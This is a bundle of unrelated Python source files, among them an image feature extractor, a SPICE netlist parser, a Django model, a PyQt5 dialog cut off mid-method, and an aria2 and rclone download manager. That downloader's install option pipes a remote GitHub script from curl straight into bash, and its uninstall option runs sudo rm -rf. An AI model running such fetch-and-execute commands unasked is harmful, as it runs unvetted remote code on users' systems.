import pandas as pd
df = pd.read_excel("2result.xlsx")
def cut(content):
content=str(content).replace("\n","")
return content
df['题干'] =df['题干'].apply(cut)
print(df.shape)
df.to_csv("清理后.csv") |
995,020 | 0854d7de25afd80bc51ab5b41a3263a69087c372 | from config_voting_ILSVRC12 import *
import tensorflow as tf
from tensorflow.python.client import timeline
from datetime import datetime
from copy import *
from FeatureExtractor import FeatureExtractor
subset_idx = 7
img_per_subset = 200
check_num = 2000 # save how many images to one file
samp_size = 50 # number of features per image
scale_size = 224
# Specify the dataset
assert(os.path.isfile(Dict['file_list']))
with open(Dict['file_list'], 'r') as fh:
image_path = [ff.strip() for ff in fh.readlines()]
img_num = len(image_path)
print('total images number : {0}'.format(img_num))
subset_ls = np.concatenate([np.arange(nn*img_per_subset, (nn+1)*img_per_subset) for nn in np.where(subset_lb==subset_idx)[0]])
subset_ls = subset_ls.astype(int)
print('subset images number : {0}'.format(len(subset_ls)))
extractor = FeatureExtractor(cache_folder=model_cache_folder, which_net='vgg16', which_layer=VC['layer'], which_snapshot=0)
res = np.zeros((featDim, 0))
loc_set = np.zeros((5, 0))
# for ii,iid in enumerate(range(img_num)):
for ii,iid in enumerate(subset_ls):
img = cv2.imread(os.path.join(Dict['file_dir'], image_path[iid]))
# img = cv2.resize(img, (scale_size, scale_size))
img = myresize(img, scale_size, 'short')
tmp = extractor.extract_feature_image(img)[0]
assert(tmp.shape[2]==featDim)
height, width = tmp.shape[0:2]
tmp = tmp[offset:height - offset, offset:width - offset, :]
ntmp = np.transpose(tmp, (2, 0, 1))
gtmp = ntmp.reshape(ntmp.shape[0], -1)
if gtmp.shape[1] >= samp_size:
rand_idx = np.random.permutation(gtmp.shape[1])[:samp_size]
else:
rand_idx = np.random.permutation(gtmp.shape[1])[:samp_size-gtmp.shape[1]]
rand_idx = np.append(range(gtmp.shape[1]), rand_idx)
res = np.column_stack((res, deepcopy(gtmp[:, rand_idx])))
for rr in rand_idx:
ihi, iwi = np.unravel_index(rr, (height - 2 * offset, width - 2 * offset))
hi = Astride * (ihi + offset) - Apad
wi = Astride * (iwi + offset) - Apad
assert (hi >= 0)
assert (hi <= img.shape[0] - Arf)
assert (wi >= 0)
assert (wi <= img.shape[1] - Arf)
loc_set = np.column_stack((loc_set, [iid, hi, wi, hi+Arf, wi+Arf]))
if (ii + 1) % check_num == 0 or ii == len(subset_ls) - 1:
# if (ii + 1) % check_num == 0 or ii == img_num - 1:
# print('saving batch {0}/{1}'.format(ii//check_num+1, math.ceil(img_num/check_num)))
print('saving batch {0}/{1}'.format(ii//check_num+1, math.ceil(len(subset_ls)/check_num)))
fnm = Dict['cache_path_sub']+'{}_set{}.pickle'.format(ii//check_num, subset_idx)
# fnm = Dict['cache_path']+'{}.pickle'.format(ii//check_num)
with open(fnm, 'wb') as fh:
pickle.dump([res, loc_set], fh)
res = np.zeros((featDim, 0))
loc_set = np.zeros((5, 0))
if ii%50==0:
print(ii, end=' ', flush=True)
|
995,021 | 2eecc9292383557f9f9c2dcaf4210d8052ceb723 | #!/usr/bin/env python
# coding: utf-8
# In[ ]:
import json, requests, os,re,urllib
from requests import get
from time import sleep
from time import ctime
global token
global rpc
global proxies
proxies = {
'http': '',
'https': '',
}
rpc = input('输入Aria2 RPC,留空为本地Aria2:\n')
if rpc == '':
print('使用本地http://127.0.0.1:6800/jsonrpc')
rpc = 'http://127.0.0.1:6800/jsonrpc'
token=input('输入Aria2密码:\n')
token='token:'+token.strip()
global path
path = input('输入保存路径:\n')
if path != '':
pass
else:
print('未输入保存路径,将存于/tmp')
path='/tmp'
if path[0]=='/':
pass
else:
path='/'+path
# In[ ]:
def aria2_addUri(url,path,title):
Dir = path + "/" + title
'''输入下载链接或者Magnet链接,然后添加下载任务。'''
jsonreq=json.dumps({'jsonrpc':'2.0',
'id':'addUri',
'method' : 'aria2.addUri',
'params':[token,[url],{"dir":Dir}]})
#print(jsonreq)
c=requests.post(rpc,data=jsonreq)
result = c.json()
return result
# In[ ]:
import os
# 下载部分,下载网页或者图片
def download(url,Type):
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/51.0.2704.63 Safari/537.36'}
content = ''
t = 0
while t < 3:
try:
content = get(url,headers = headers,timeout=20,proxies=proxies)
if Type == '':
pass
else:
print('获取',Type,'成功')
return content
t = 4
except Exception as e:
t = t + 1
print('错误,',e)
content='no picture'
return content
# In[3]:
# 获取图片md链接
def addReadme(gid):
jsonreq = json.dumps({'jsonrpc':'2.0', 'id':'qwer',
'method':'aria2.getFiles',
'params':[token,gid]})
c = requests.post(rpc,data=jsonreq)
d=c.json()
e = d['result']
print(e)
Dir = re.search(r"path\': \'/.*?\.jpg",str(e))
#print('1',Dir)
#print(Dir)
newDir = ''
try:
Dir = Dir.group()
Dir = (Dir).replace("path': '",'')
newDir = urllib.parse.quote(Dir)
except:
print('eee')
md = "\n"
return md
# 获取分页数以及每个分页的链接,然后
def get_page_info():
status = True
urls=[]
log = open('/tmp/downloadlog','a')
log.write('\n' + '\t' + str(ctime()) + '\n')
log.close
while status:
# 读取每页的页面链接
url = input('添加网址链接,exit终止输入:\n')
if url == 'exit':
status = 0
else:
urls.append(url)
log = open('/tmp/downloadlog','a')
log.write(url+'\n')
log.close
# 扫描该分页下该标题内的图片信息
for url in urls:
pics = []
mds = []
magnet = ''
try:
for line in (download(url,'').content.decode('utf-8').splitlines()):
# 标题
if '<meta name="keywords" content=' in line:
l = line.find("content=") + 9
rest = line[l:]
r = rest.find('"')
title = rest[:r]
print("\n"+"#####"+title+"#####")
# 获取所有的图片链接
elif "img id" in line:
import re
p = [m.start() for m in re.finditer('http', line)]
for l in p:
rest = line[l:]
r = rest.find('"')
pic = rest[:r]
if pics != []:
if pic != pics[-1]:
pics.append(pic)
else:
pics.append(pic)
# 获取磁力链接
elif "magnet:?xt=" in line:
#print(line)
l = line.find('magnet:?')
rest = line[l:]
r = rest.find('''<''')
magnet = rest[:r]
print(magnet)
except Exception as e:
print('发生错误,请确认是否输入正确网页,刚刚记录的网址在/tmp/downloadlog可找到。或到GitHub提交以下错误:\n')
print(e)
#print(pics)
i = 0
print('共',len(pics),'图')
for pic in pics:
i = i + 1
file_path = path + "/" + title + "/" + str(i) + '.jpg'
ndir = urllib.parse.quote(file_path)
md = "\n"
mds.append(md)
#print ("getting page ",head)
picture = download(pic,file_path)
if not os.path.exists(str(path)):
os.makedirs(str(path))
#创建页文件夹下的分文件夹
if not os.path.exists((path) + "/" + title):
os.makedirs((path) + "/" + title)
with open(file_path, 'wb') as file:
try:
file.write(picture.content)
except:
print('pic error')
print('adding file')
try:
aria2_addUri(magnet,path,title)
creat_file(title,magnet,path,mds)
except:
pass
# In[ ]:
def creat_file(title,magnet,path,mds):
if not os.path.exists(str(path)):
os.makedirs(str(path))
#创建页文件夹下的分文件夹
if not os.path.exists((path) + "/" + title):
os.makedirs((path) + "/" + title)
index = title + """\n bt: """
index = index + magnet + '\n'
for md in mds:
index = index + md
index_file = path + '/' + title + "/" + "README.md"
with open(index_file,'w',encoding = 'utf-8') as w_file:
for each_line in index:
w_file.write(each_line)
# Creat php web page
php_index = """ <?php
$folder = "./"; // 文件夹路径
$files = array();
$handle = opendir($folder); // 遍历文件夹
while(false!==($file=readdir($handle))){
if($file!='.' && $file!='..'){
$hz=strstr($file,".");
if($hz==".gif" or $hz==".jpg" or $hz==".JPG"or $hz==".JPEG"or
$hz==".PNG"or $hz==".png"or $hz==".GIF")
{$files[] = $file; }
}
}
if($files){
foreach($files as $k=>$v){
echo '<img widht=auto src="'.$v.'">'; // 循环显示
}
}
?>
"""
php_index_file = path + '/' + title + "/" + "index.php"
with open(php_index_file,'w',encoding = 'utf-8') as w_file:
w_file.write(php_index)
# In[ ]:
def aria2_remove(gid):
jsonreq = json.dumps({'jsonrpc':'2.0', 'id':'remove',
'method':'aria2.remove',
'params':[token,gid]})
c=requests.post(rpc,data=jsonreq)
print(c.content)
# In[115]:
def aria2_tellActive():
downloads={}
jsonreq = json.dumps({'jsonrpc':'2.0', 'id':'qwer',
'method':'aria2.tellActive',
'params':[token]})
c=(requests.post(rpc,data=jsonreq)).content
a=json.loads(c.decode('utf-8'))
b=a['result']
#print(c.content)
for info in b:
complet_lenth = re.search(r"completedLength\'\: \'[0-9]*",str(info))
complet_lenth = complet_lenth.group()
complet_lenth = complet_lenth.replace("completedLength': '",'')
total_lenth = re.search(r"totalLength\'\: \'[0-9]*",str(info))
total_lenth = total_lenth.group()
total_lenth = total_lenth.replace("totalLength': '",'')
directory = re.search(r"dir\'\: \'.*?,",str(info))
directory = directory.group()
directory = directory.replace("dir': '","").replace("',",'')
gid = re.search(r"gid\'\: \'[a-zA-Z0-9]*",str(info))
gid = gid.group()
gid = gid.replace("gid': '","")
#print(complet_lenth)
#print(total_lenth)
if total_lenth == complet_lenth:
if (int(complet_lenth) > 536870912):
print('@',directory,'download complet')
downloads[directory]=gid
else:
percent = (int(complet_lenth)/int(total_lenth)) * 100
print( int(percent),'%',directory)
return downloads
# In[ ]:
def checke_aria_rclone():
from os import popen
ariaStatus = popen('aria2c -v').readline()
if ariaStatus:
pass
else:
ariaStatus = ('未安装Aria2')
rcloneStatus = popen('rclone --version').readline()
if rcloneStatus:
pass
else:
rcloneStatus = ('未安装rclone')
result = '\t' + ariaStatus + '\t' + rcloneStatus
return result
def menu(path):
dependens = checke_aria_rclone()
print('''-----------自动下片机------------''')
print('''- 1. 添加se网址链接''')
print('''- 2. 检测状态''')
print('''- 3. 使用rclone上传已完成的bt任务''')
print('''- 4. 添加正常下载链接''')
if '未' in dependens:
print('''- 5. 安装Aria2Dash与rclone''')
else:
pass
print('''- 6. 卸载''')
print("- 7. 设置网页解析代理")
print('''- 0. 退出''')
print('''--------------------------------''')
print(checke_aria_rclone())
print('''--------------------------------''')
opt = str(input ('输入选项:'))
if opt == '1':
get_page_info()
elif opt == '2':
try:
aria2_tellActive()
except Exception as e:
print (e)
print('无法连接Aria2服务,请确认已正确启动并填写rpc')
#return 0
elif opt == '3':
print(str(os.popen('rclone listremotes').read()).replace(':',''))
rclone = input('输入选择使用的rclone remote: ')
count = 0
while True:
from time import sleep
os.system('date')
try:
file = aria2_tellActive()
except Exception as e:
print (e)
print('无法连接Aria2服务,请确认已正确启动并填写rpc')
return 0
try:
for key in file.keys():
dir = key.strip()
if ' ' in dir:
dir = dir.replace(' ','''\ ''')
if dir[0] == '/':
pass
else:
dir = '/' + dir
print('---------------------------------------------------')
print('Preparing to upload ',dir)
#cmd0 = 'rclone copy ' + dir + ' gdrive:' + dir + ' -P'
print('uploading...')
cmd = 'rclone move ' + dir + ' ' + rclone.strip() + ':' + dir + ' -P'
sleep(30)
#os.system(cmd0)
print(cmd)
#input('ss')
os.system(cmd)
log = open('/tmp/uploadlog','a')
log.write(str(ctime()) + dir + '\n')
log.close
aria2_remove(file[key])
#os.system(cmd2)
sleep(10)
count = count + 1
if count == 10:
count = 0
print("sync between clouds")
#os.system("""rclone sync gdrive:/ bcgdrive:/ -P""")
#os.system("""rclone copy gdrive:/ hell:/ -P""")
except Exception as e:
print (e)
print('---------------------------------------------------')
sleep(30)
elif opt == '4':
path = input('input saving path:\n')
folder = input('input saving folder:\n')
url = input('input url/magnet:\n')
aria2_addUri(url,path,folder)
elif opt == '5':
o = input('将运行快速部署Aria2的脚本。具有剩余容量显示监控及显示功能。本脚本会一同安装文件管理器,按y确认安装,n取消。详细内容看以下链接:\n https://github.com/Masterchiefm/Aria2Dash \n 输入选择:')
if o == 'y':
print('请稍等...')
os.system('bash <(curl -s -L https://github.com/Masterchiefm/Aria2Dash/raw/master/Aria2Dash.sh)')
os.system('apt instal rclone -y')
else:
print('已取消')
elif opt == '6':
os.system('sudo rm -rf /usr/bin/aria2py')
os.system('sudo rm -rf /usr/bin/aria2_py.py')
print('卸载完成,无残留')
elif opt == '0':
return 0
elif opt == "7":
global proxies
proxy = input("输入http proxy地址,如输入 127.0.0.1:10809")
proxy_url = "http://" + proxy.strip()
proxy_url2 = "https://" + proxy.strip()
proxies = {
'http': proxy_url,
'https': proxy_url2,
}
else:
print('输入有误')
return 1
return 1
# In[ ]:
if __name__ == "__main__":
a=1
while a:
a = menu(path)
|
995,022 | 81d0817abf9b3e15db8e4ce70a31e1428d1e6997 |
# -*- coding: utf-8 -*-
class Solution(object): # binary manipulation trick
def reverseBits(self, n):
ans = 0
for i in xrange(32):
ans = (ans << 1) + (n & 1) #二进制与操作符"&": http://www.tutorialspoint.com/python/python_basic_operators.htm
n >>= 1
return ans
# if n = 234 = 00000000000000000000000011101010, the for loop从右到左将二进制转换成十进制;
# 将"<<1"看成"*2", 那么最右的0乘了31次,右二的1乘了31次,以此类推(只是乘号"*"通过for循环和ans = (ans << 1) + (n & 1)的操作分插
# 在一层层的括号里了: 例如((((0*2)+1)*2+0)*2+1)=5,其实是0*2^3+1*2^2+0*2^1+1*2^0变形,以便放到每一次loop里)
a = 43261596
Sol = Solution()
print Sol.reverseBits(a)
'''
class Solution(object):
def reverseBits(self, n):
def find(num):
i = 0
while 2**i<=num:
i += 1
i -= 1
return i
lst = []
while n > 0:
j = find(n)
lst.append(j)
n -= 2**j
bits = [0 for x in xrange(32)]
for item in lst:
bits[item] = 1
res = 0
length = len(bits)
for y in xrange(32):
if bits[length-1-y] == 1:
res += 2**y
return res
'''
|
995,023 | 1f39c69a6a2a33b5e22ff05c323c81a9e54b03a9 | from os import link
from django.contrib.auth import forms
from django.contrib.auth.models import User
from django.db import models
from programms.models import Programm
# Create your models here.
class Download(models.Model):
user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)
prog = models.ForeignKey(Programm, on_delete=models.SET_NULL, null=True)
link = models.CharField(max_length=500)
def __str__(self):
return self.product.title |
995,024 | 8d8dbb444f1e508741035dd3b53d0254ed373701 | import re
from Element import HSrc
import Circuit
import Element
def parse(filename):
mycircuit = Circuit.Circuit(title="", filename=filename)
file = open(filename, "r")
lines = []
line_number = 0
elements = []
if file is not None:
while True:
line = file.readline()
line_number = line_number + 1
line = line.strip().lower()
if line_number == 1:
mycircuit.title = line
elif len(line) == 0:
break
line = plus_line(file, line)
if line[0] == '.':
line_elements = line.lower().split()
if line_elements[0] == ".end":
print("End of the netlist file.")
elif line_elements[0] == ".op":
mycircuit.op = True
elif line_elements[0] == ".dc":
mycircuit.dc = True
mycircuit.dc_source = line_elements[1]
mycircuit.dc_start = unit_transform(line_elements[2])
mycircuit.dc_stop = unit_transform(line_elements[3])
mycircuit.dc_point_number = \
(mycircuit.dc_stop - mycircuit.dc_start) / unit_transform(line_elements[4])
# TODO:mycircuit.dc_type = line_elements[]
elif line_elements[0] == ".ac":
pattern = re.match(r'.AC (.*) (.*) ([0-9.]*[FPNUMKGT]?)(Hz)? ([0-9.]*[FPNUMKGT]?)(Hz)?', line, re.I)
mycircuit.ac = True
mycircuit.ac_type = pattern.group(1)
mycircuit.ac_point_number = int(unit_transform(pattern.group(2)))
mycircuit.ac_start = unit_transform(pattern.group(3))
mycircuit.ac_stop = unit_transform(pattern.group(5))
elif line_elements[0] == ".tran":
pattern = re.match(r'.tran ([0-9.]*[FPNUMKGT]?)(s)? ([0-9.]*[FPNUMKGT]?)(s)?', line, re.I)
mycircuit.tran = True
mycircuit.tran_start = 0
mycircuit.tran_step = unit_transform(pattern.group(1))
mycircuit.tran_stop = unit_transform(pattern.group(3))
else:
pass
lines.append((line, line_number))
for line, line_number in lines:
if line_number > 1:
r_pattern = re.match(r'^R.*', line, re.I)
c_pattern = re.match(r'^C.*', line, re.I)
l_pattern = re.match(r'^L.*', line, re.I)
d_pattern = re.match(r'^D.*', line, re.I)
mos_pattern = re.match(r'^M.*', line, re.I)
v_pattern = re.match(r'^V.*', line, re.I)
ispulse = re.search(r'PULSE', line, re.I)
i_pattern = re.match(r'^I.*', line, re.I)
e_pattern = re.match(r'^E.', line, re.I)
f_pattern = re.match(r'^F.', line, re.I)
g_pattern = re.match(r'^G.', line, re.I)
h_pattern = re.match(r'^H.', line, re.I)
if r_pattern:
element = parse_resistor(line, mycircuit)
elif c_pattern:
element = parse_capacitor(line, mycircuit)
elif l_pattern:
element = parse_inductor(line, mycircuit)
elif d_pattern:
element = parse_diode(line, mycircuit)
mycircuit.has_nonlinear = True
elif mos_pattern:
element = parse_mos(line, mycircuit)
mycircuit.has_nonlinear = True
elif v_pattern:
if ispulse:
element = parse_v_pulse_src(line, mycircuit)
else:
element = parse_vsrc(line, mycircuit)
elif i_pattern:
element = parse_isrc(line, mycircuit)
elif e_pattern:
element = parse_vcvs(line, mycircuit)
elif f_pattern:
element = parse_cccs(line, mycircuit)
elif g_pattern:
element = parse_vccs(line, mycircuit)
elif h_pattern:
element = parse_ccvs(line, mycircuit)
else:
element = None
if element:
elements += [element]
return mycircuit, elements
def parse_resistor(line, mycircuit):
line_elements = line.split()
n1 = mycircuit.add_node(line_elements[1])
n2 = mycircuit.add_node(line_elements[2])
value = unit_transform(line_elements[3])
element = Element.Resistor(name=line_elements[0], n1=n1, n2=n2, value=value)
return [element]
def parse_capacitor(line, mycircuit):
line_elements = line.lower().replace('f', '').split()
n1 = mycircuit.add_node(line_elements[1])
n2 = mycircuit.add_node(line_elements[2])
value = unit_transform(line_elements[3])
pattern = re.match(r'(^C.*) (.*) (.*) ([0-9.]*[FPNUMKGT]?)F?', line, re.I)
ic = None
if pattern.group(4):
ic = unit_transform(pattern.group(4))
element = Element.Capacitor(name=line_elements[0], n1=n1, n2=n2, value=value, ic=ic)
return [element]
def parse_inductor(line, mycircuit):
line_elements = line.lower().replace('h', '').split()
n1 = mycircuit.add_node(line_elements[1])
n2 = mycircuit.add_node(line_elements[2])
value = unit_transform(line_elements[3])
ic = None
if len(line_elements) > 4:
ic = line_elements[4]
element = Element.Inductor(name=line_elements[0], n1=n1, n2=n2, value=value, ic=ic)
return [element]
def parse_diode(line, mycircuit):
line_elements = line.split()
n1 = mycircuit.add_node(line_elements[1])
n2 = mycircuit.add_node(line_elements[2])
model = line_elements[3]
area = line_elements[4]
element = Element.diode(name=line_elements[0], n1=n1, n2=n2, model=model, area=area)
return [element]
def parse_mos(line, mycircuit):
line_elements = line.split()
nd = mycircuit.add_node(line_elements[1])
ng = mycircuit.add_node(line_elements[2])
ns = mycircuit.add_node(line_elements[3])
nb = mycircuit.add_node(line_elements[4])
model = line_elements[5]
w = None
l = None
pattern = re.match(
r'(^M.*) (.*) (.*) (.*) (.*) (.*) ([LW])=([0-9.]*[FPNUMKGT]?) ([LW])=([0-9.]*[FPNUMKGT]?)', line, re.I)
# 1 2 3 4 5 6 7 8 9 10
if pattern.group(7).lower() == 'w':
w = unit_transform(pattern.group(8))
elif pattern.group(7).lower() == 'l':
l = unit_transform(pattern.group(8))
if pattern.group(9).lower() == 'w':
w = unit_transform(pattern.group(10))
elif pattern.group(9).lower() == 'l':
l = unit_transform(pattern.group(10))
element = Element.mos(name=line_elements[0], nd=nd, ng=ng, ns=ns, nb=nb, model=model, w=w, l=l)
return [element]
def parse_vsrc(line, mycircuit):
line_elements = line.split()
dc_value = None
abs_ac = None
arg_ac = None
pattern = re.match(
r'(^V.*) (.*) (.*) (.*)?', line, re.I)
n1 = mycircuit.add_node(line_elements[1])
n2 = mycircuit.add_node(line_elements[2])
ac_pattern = re.search(
r'([AD]C) ([0-9.]*[FPNUMKGT]?)V? ([0-9.]*)?', line.replace('=', ' ').replace(',', ' '), re.I)
if ac_pattern:
if ac_pattern.group(1).lower() == 'ac':
abs_ac = unit_transform(ac_pattern.group(2))
arg_ac = unit_transform(ac_pattern.group(3))
else:
dc_value = pattern.group(4)
element = Element.VSrc(name=line_elements[0], n1=n1, n2=n2,
dc_value=dc_value, abs_ac=abs_ac, arg_ac=arg_ac)
return [element]
def parse_v_pulse_src(line, mycircuit):
pattern = re.match(r'(^V.*) (.*) (.*) PULSE (.*) (.*) (.*) (.*) (.*) (.*) (.*)', line, re.I)
# 1 2 3 4 5 6 7 8 9 10
name = pattern.group(1)
n1 = mycircuit.add_node(pattern.group(2))
n2 = mycircuit.add_node(pattern.group(3))
voltage_low = unit_transform(pattern.group(4).lower().replace('v', ''))
voltage_high = unit_transform(pattern.group(5).lower().replace('v', ''))
delay = unit_transform(pattern.group(6).lower().replace('s', ''))
rise = unit_transform(pattern.group(7).lower().replace('s', ''))
fall = unit_transform(pattern.group(8).lower().replace('s', ''))
width = unit_transform(pattern.group(9).lower().replace('s', ''))
period = unit_transform(pattern.group(10).lower().replace('s', ''))
element = Element.VPulseSrc(name=name, n1=n1, n2=n2,
voltage_low=voltage_low, voltage_high=voltage_high,
delay=delay, rise=rise, fall=fall, width=width, period=period)
return [element]
def parse_isrc(line, mycircuit):
line_elements = line.split()
dc_value = None
ac_value = None
n1 = mycircuit.add_node(line_elements[1])
n2 = mycircuit.add_node(line_elements[2])
pattern = re.match(
r'(^I.) (.*) (.*) ([AD]C)?(=)?( ?)([0-9.]*[FPNUMKGT]?)A?(,?)( ?)([0-9.]*$)?', line, re.I)
# 1 2 n1 3 n2 4 5 6 7 8 9 10
if pattern.group(4):
if pattern.group(4).lower() == 'dc':
dc_value = unit_transform(pattern.group(7))
elif pattern.group(4).lower() == 'ac':
ac_value = unit_transform(pattern.group(7))
else:
dc_value = unit_transform(pattern.group(7))
element = Element.ISrc(name=line_elements[0], n1=n1, n2=n2, dc_value=dc_value, ac_value=ac_value)
return [element]
def parse_vcvs(line, mycircuit):
line_elements = line.split()
n1 = mycircuit.add_node(line_elements[1])
n2 = mycircuit.add_node(line_elements[2])
nc1 = mycircuit.add_node(line_elements[3])
nc2 = mycircuit.add_node(line_elements[4])
element = Element.ESrc(name=line_elements[0], n1=n1, n2=n2, nc1=nc1, nc2=nc2,
value=unit_transform(line_elements[5]))
return [element]
def parse_ccvs(line, mycircuit):
line_elements = line.split()
n1 = mycircuit.add_node(line_elements[1])
n2 = mycircuit.add_node(line_elements[2])
element = Element.HSrc(name=line_elements[0], n1=n1, n2=n2, source_name=line_elements[3],
value=unit_transform(line_elements[4])) # type: HSrc
return [element]
def parse_vccs(line, mycircuit):
line_elements = line.split()
n1 = mycircuit.add_node(line_elements[1])
n2 = mycircuit.add_node(line_elements[2])
nc1 = mycircuit.add_node(line_elements[3])
nc2 = mycircuit.add_node(line_elements[4])
element = Element.GSrc(name=line_elements[0], n1=n1, n2=n2, nc1=nc1, nc2=nc2,
value=unit_transform(line_elements[5]))
return [element]
def parse_cccs(line, mycircuit):
line_elements = line.split()
n1 = mycircuit.add_node(line_elements[1])
n2 = mycircuit.add_node(line_elements[2])
element = Element.FSrc(name=line_elements[0], n1=n1, n2=n2, source_name=line_elements[3],
value=unit_transform(line_elements[4]))
return [element]
def unit_transform(str_value):
unit_dict = {'f': 1e-15, 'p': 1e-12, 'n': 1e-9, 'u': 1e-6, 'm': 1e-3, 'k': 1e+3, 'meg': 1e+6, 'g': 1e+9, 't': 1e+12}
str_value = str_value.lower()
if str_value[-1] in 'fpnumkgt':
return float(float(str_value[:-1]) * unit_dict[str_value[-1]])
else:
return float(str_value)
def plus_line(file, line):
while True:
last = file.tell()
next_line = file.readline()
next_line = next_line.strip().lower()
if not next_line:
break
elif next_line[0] == '+':
line += ' ' + next_line[1:]
else:
file.seek(last)
break
return line
|
995,025 | 9876b5cb5f79664eab71c574da2fc920c27f7f53 | import Common.math_functions as mf
import numpy as np
import matplotlib.pylab as plt
x = np.arange(-5.0, 5.0, 0.1)
#y = pr.step_function(x)
y = mf.sigmoid(x)
plt.plot(x, y)
plt.ylim(-0.1, 1.1) #指定y轴的范围
plt.show() |
995,026 | 96640a290bf1947c9117e3aad131a68cc47e9cec | # Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""This package contains the core information classes that support asset management applications that deal with the physical and lifecycle aspects of various network resources (as opposed to power system resource models defined in IEC61970::Wires package, which support network applications).
"""
from CIM16.IEC61968.Assets.ProductAssetModel import ProductAssetModel
from CIM16.IEC61968.Assets.AssetModel import AssetModel
from CIM16.IEC61968.Assets.Asset import Asset
from CIM16.IEC61968.Assets.ComMedia import ComMedia
from CIM16.IEC61968.Assets.AssetContainer import AssetContainer
from CIM16.IEC61968.Assets.AssetFunction import AssetFunction
from CIM16.IEC61968.Assets.Seal import Seal
from CIM16.IEC61968.Assets.AssetInfo import AssetInfo
from CIM16.IEC61968.Assets.AcceptanceTest import AcceptanceTest
nsURI = "http://iec.ch/TC57/2013/CIM-schema-cim16#Assets"
nsPrefix = "cimAssets"
class CorporateStandardKind(str):
"""Values are: standard, underEvaluation, other, experimental
"""
pass
class SealConditionKind(str):
"""Values are: open, broken, other, missing, locked
"""
pass
class SealKind(str):
"""Values are: lead, other, steel, lock
"""
pass
class AssetModelUsageKind(str):
"""Values are: customerSubstation, transmission, other, substation, unknown, distributionOverhead, distributionUnderground, streetlight
"""
pass
|
995,027 | 542ae1aaa46e760daffe1322e74ff73b21f8bdc0 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui_prot0.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(676, 581)
self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
self.buttonBox.setGeometry(QtCore.QRect(250, 520, 341, 32))
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.pushButton = QtWidgets.QPushButton(Dialog)
self.pushButton.setGeometry(QtCore.QRect(90, 510, 113, 32))
self.pushButton.setObjectName("pushButton")
self.pushButton_2 = QtWidgets.QPushButton(Dialog)
self.pushButton_2.setGeometry(QtCore.QRect(220, 510, 113, 32))
self.pushButton_2.setObjectName("pushButton_2")
self.tableWidget = QtWidgets.QTableWidget(Dialog)
self.tableWidget.setGeometry(QtCore.QRect(20, 80, 371, 321))
self.tableWidget.setObjectName("tableWidget")
self.tableWidget.setColumnCount(2)
self.tableWidget.setRowCount(0)
item = QtWidgets.QTableWidgetItem()
self.tableWidget.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.tableWidget.setHorizontalHeaderItem(1, item)
self.tableWidget_2 = QtWidgets.QTableWidget(Dialog)
self.tableWidget_2.setGeometry(QtCore.QRect(20, 410, 371, 91))
self.tableWidget_2.setObjectName("tableWidget_2")
self.tableWidget_2.setColumnCount(1)
self.tableWidget_2.setRowCount(2)
item = QtWidgets.QTableWidgetItem()
self.tableWidget_2.setVerticalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.tableWidget_2.setVerticalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.tableWidget_2.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.tableWidget_2.setItem(0, 0, item)
item = QtWidgets.QTableWidgetItem()
self.tableWidget_2.setItem(1, 0, item)
self.textBrowser = QtWidgets.QTextBrowser(Dialog)
self.textBrowser.setGeometry(QtCore.QRect(50, 20, 391, 41))
self.textBrowser.setObjectName("textBrowser")
self.pushButton_3 = QtWidgets.QPushButton(Dialog)
self.pushButton_3.setGeometry(QtCore.QRect(440, 20, 113, 41))
self.pushButton_3.setDefault(False)
self.pushButton_3.setObjectName("pushButton_3")
self.pushButton_4 = QtWidgets.QPushButton(Dialog)
self.pushButton_4.setGeometry(QtCore.QRect(550, 20, 113, 41))
self.pushButton_4.setObjectName("pushButton_4")
self.label_setPix = QtWidgets.QLabel(Dialog)
self.label_setPix.setGeometry(QtCore.QRect(400, 80, 250, 250))
self.label_setPix.setObjectName("label_setPix")
self.retranslateUi(Dialog)
self.buttonBox.accepted.connect(Dialog.accept)
self.buttonBox.rejected.connect(Dialog.reject)
self.pushButton.clicked.connect(self.tableWidget.update)
self.pushButton.clicked.connect(self.tableWidget.selectAll)
self.pushButton_2.clicked['bool'].connect(Dialog.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.pushButton.setText(_translate("Dialog", "会計"))
self.pushButton_2.setText(_translate("Dialog", "終了"))
item = self.tableWidget.horizontalHeaderItem(0)
item.setText(_translate("Dialog", "商品名"))
item = self.tableWidget.horizontalHeaderItem(1)
item.setText(_translate("Dialog", "金額"))
item = self.tableWidget_2.verticalHeaderItem(0)
item.setText(_translate("Dialog", "小計"))
item = self.tableWidget_2.verticalHeaderItem(1)
